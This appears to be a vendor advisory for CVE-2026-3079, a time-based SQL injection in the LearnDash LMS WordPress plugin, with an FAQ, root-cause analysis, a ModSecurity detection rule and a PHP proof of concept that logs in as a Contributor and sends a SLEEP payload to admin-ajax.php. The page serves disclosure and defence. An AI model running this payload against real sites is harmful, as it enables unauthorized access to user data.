What is CVE-2026-3079?

CVE-2026-3079 is a medium severity SQL injection vulnerability found in the LearnDash LMS plugin for WordPress. It allows authenticated users with Contributor-level access and above to exploit the ‘filters[orderby_order]’ parameter in the ‘learndash_propanel_template’ AJAX action, potentially leading to unauthorized data exposure.

How does the SQL injection work?

The vulnerability arises from insufficient escaping of user input in SQL queries. An attacker can manipulate the ‘filters[orderby_order]’ parameter to inject arbitrary SQL commands, which can be executed by the database, allowing the attacker to extract sensitive information.

Who is affected by this vulnerability?

All installations of the LearnDash LMS plugin up to and including version 5.0.3 are affected. Users with Contributor-level access or higher can exploit this vulnerability, which may include untrusted users if such roles are granted.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the LearnDash LMS plugin you are using. If it is version 5.0.3 or earlier, your site is susceptible to this vulnerability. Additionally, review user roles to identify if any Contributor-level users have access.

What is the CVSS score and what does it mean?

CVE-2026-3079 has a CVSS score of 6.5, categorized as medium severity. This score indicates that while the vulnerability is not critical, it poses a significant risk due to its potential for data exposure and the ease of exploitation by authenticated users.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the LearnDash LMS plugin to version 5.0.3.1 or later, where the issue has been addressed. Additionally, ensure that proper input validation and prepared statements are used in SQL queries to prevent similar vulnerabilities.

What are the potential consequences of exploitation?

If exploited, an attacker could extract sensitive data from the WordPress database, including user information and course content. This unauthorized access could lead to data breaches and compromise user privacy.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can authenticate as a Contributor and send a crafted POST request to the AJAX endpoint, manipulating the ‘filters[orderby_order]’ parameter to execute a time-based SQL injection. This demonstrates the vulnerability’s practical exploitation method.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider restricting access to the AJAX endpoint or reviewing user roles to limit Contributor access. Additionally, monitor logs for unusual activity that may indicate attempts to exploit this vulnerability.

Are there any additional security practices I should follow?

In addition to updating plugins, ensure regular security audits, implement least privilege access for user roles, and use security plugins that can help detect and mitigate SQL injection vulnerabilities.

How can I stay informed about future vulnerabilities?

Subscribe to security mailing lists, follow relevant security blogs, and regularly check the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress and its plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 24, 2026

CVE-2026-3079: LearnDash LMS <= 5.0.3 – Authenticated (Contributor+) SQL Injection via 'filters[orderby_order]' Parameter (sfwd-lms)

CVE ID CVE-2026-3079

Plugin sfwd-lms

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 5.0.3

Patched Version —

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3079 (metadata-based):
This vulnerability is a blind time-based SQL injection in the LearnDash LMS WordPress plugin, affecting versions up to and including 5.0.3. The flaw resides in the ‘learndash_propanel_template’ AJAX action handler. Attackers with at least Contributor-level access can inject arbitrary SQL commands via the ‘filters[orderby_order]’ parameter, enabling data exfiltration from the database. The CVSS score of 6.5 (Medium) reflects its network accessibility, low attack complexity, and high confidentiality impact.

Atomic Edge research infers the root cause is improper neutralization of user input within an SQL command (CWE-89). The description states insufficient escaping and lack of query preparation. This suggests the plugin likely constructs an SQL query by directly concatenating the user-controlled ‘filters[orderby_order]’ parameter into an ORDER BY clause or a similar query fragment. The vulnerable code path is almost certainly within the function handling the ‘learndash_propanel_template’ AJAX action, where the parameter is received but not sanitized with `esc_sql()` or passed through `$wpdb->prepare()`.

Exploitation requires an authenticated user with Contributor privileges or higher. The attacker sends a POST request to the standard WordPress AJAX endpoint, `/wp-admin/admin-ajax.php`, with the `action` parameter set to ‘learndash_propanel_template’. The attack payload is placed in the `filters[orderby_order]` parameter. A blind time-based injection payload would resemble `CASE WHEN (SELECT SLEEP(5) FROM wp_users LIMIT 1) THEN ‘id’ ELSE ‘date’ END`. This manipulates the query’s order logic and triggers a measurable delay, allowing an attacker to infer data from the database.

Effective remediation requires using prepared statements or proper escaping. The patched version 5.0.3.1 likely replaced the vulnerable raw concatenation with a call to `$wpdb->prepare()` for the dynamic ORDER BY fragment. Alternatively, the fix could involve rigorous allow-listing of the ‘orderby_order’ value against a set of permitted column names and directions (ASC/DESC). The plugin must also ensure proper capability checks are present, though the vulnerability description confirms they are insufficient.

The primary impact is unauthorized information disclosure. Successful exploitation allows an attacker to extract sensitive data from the WordPress database, including hashed user passwords, user emails, private course content, or other plugin-specific sensitive information. While the vulnerability is a blind injection, time-based techniques can systematically retrieve this data. The requirement for Contributor authentication limits the attack surface but does not eliminate risk, as many sites grant such roles to untrusted users.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3079 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20263079,phase:2,deny,status:403,chain,msg:'CVE-2026-3079: LearnDash LMS SQL Injection via learndash_propanel_template AJAX',severity:'CRITICAL',tag:'CVE-2026-3079',tag:'application:wordpress',tag:'plugin:learndash'"
  SecRule ARGS_POST:action "@streq learndash_propanel_template" "chain"
    SecRule ARGS_POST:filters.orderby_order "@rx (?i)(?:sleep(s*d+s*)|benchmarks*(|pg_sleep(|waitfors+delays+['"]d|b(?:union|select|insert|update|delete|drop|create|alter)b.*b(?:sleep|benchmark|pg_sleep|waitfor)b)" 
      "setvar:'tx.sql_injection_score=+1',t:none,t:urlDecodeUni,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3079 - LearnDash LMS <= 5.0.3 - Authenticated (Contributor+) SQL Injection via 'filters[orderby_order]' Parameter
<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS - Contributor account username
$password = 'contributor_pass'; // CHANGE THIS - Contributor account password

// Step 1: Authenticate and obtain session cookies.
// This PoC assumes standard WordPress authentication via wp-login.php.
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_3079_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
]);
$response = curl_exec($ch);

// Step 2: Craft the SQL injection payload for the 'learndash_propanel_template' AJAX action.
// This payload tests for a time delay. If the database user has sufficient privileges and the plugin is vulnerable,
// the request will take approximately 5 seconds.
$injection_payload = "CASE WHEN (SELECT SLEEP(5) FROM wp_users LIMIT 1) THEN 'id' ELSE 'date' END";

$post_data = [
    'action' => 'learndash_propanel_template',
    'filters[orderby_order]' => $injection_payload
];

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => $post_data,
    CURLOPT_POST => true,
]);

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);

$request_duration = $end_time - $start_time;

// Step 3: Analyze the response time.
echo "Request duration: " . round($request_duration, 2) . " secondsn";
if ($request_duration >= 5) {
    echo "Potential SQL Injection vulnerability detected (time-based blind).n";
} else {
    echo "No significant delay observed. The site may be patched or the payload was blocked.n";
}

unlink($cookie_file);

?>

Frequently Asked Questions

What is CVE-2026-3079?
Overview of the vulnerability
CVE-2026-3079 is a medium severity SQL injection vulnerability found in the LearnDash LMS plugin for WordPress. It allows authenticated users with Contributor-level access and above to exploit the ‘filters[orderby_order]’ parameter in the ‘learndash_propanel_template’ AJAX action, potentially leading to unauthorized data exposure.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient escaping of user input in SQL queries. An attacker can manipulate the ‘filters[orderby_order]’ parameter to inject arbitrary SQL commands, which can be executed by the database, allowing the attacker to extract sensitive information.
Who is affected by this vulnerability?
Identifying vulnerable users
All installations of the LearnDash LMS plugin up to and including version 5.0.3 are affected. Users with Contributor-level access or higher can exploit this vulnerability, which may include untrusted users if such roles are granted.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the LearnDash LMS plugin you are using. If it is version 5.0.3 or earlier, your site is susceptible to this vulnerability. Additionally, review user roles to identify if any Contributor-level users have access.
What is the CVSS score and what does it mean?
Understanding the risk level
CVE-2026-3079 has a CVSS score of 6.5, categorized as medium severity. This score indicates that while the vulnerability is not critical, it poses a significant risk due to its potential for data exposure and the ease of exploitation by authenticated users.
How can I fix or mitigate this vulnerability?
Remediation steps
To mitigate this vulnerability, update the LearnDash LMS plugin to version 5.0.3.1 or later, where the issue has been addressed. Additionally, ensure that proper input validation and prepared statements are used in SQL queries to prevent similar vulnerabilities.
What are the potential consequences of exploitation?
Impact of successful attacks
If exploited, an attacker could extract sensitive data from the WordPress database, including user information and course content. This unauthorized access could lead to data breaches and compromise user privacy.
What does the proof of concept demonstrate?
Example of exploitation
The proof of concept illustrates how an attacker can authenticate as a Contributor and send a crafted POST request to the AJAX endpoint, manipulating the ‘filters[orderby_order]’ parameter to execute a time-based SQL injection. This demonstrates the vulnerability’s practical exploitation method.
What should I do if I cannot update the plugin immediately?
Interim measures
If immediate updates are not possible, consider restricting access to the AJAX endpoint or reviewing user roles to limit Contributor access. Additionally, monitor logs for unusual activity that may indicate attempts to exploit this vulnerability.
Are there any additional security practices I should follow?
General security recommendations
In addition to updating plugins, ensure regular security audits, implement least privilege access for user roles, and use security plugins that can help detect and mitigate SQL injection vulnerabilities.
How can I stay informed about future vulnerabilities?
Keeping updated on security issues
Subscribe to security mailing lists, follow relevant security blogs, and regularly check the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress and its plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations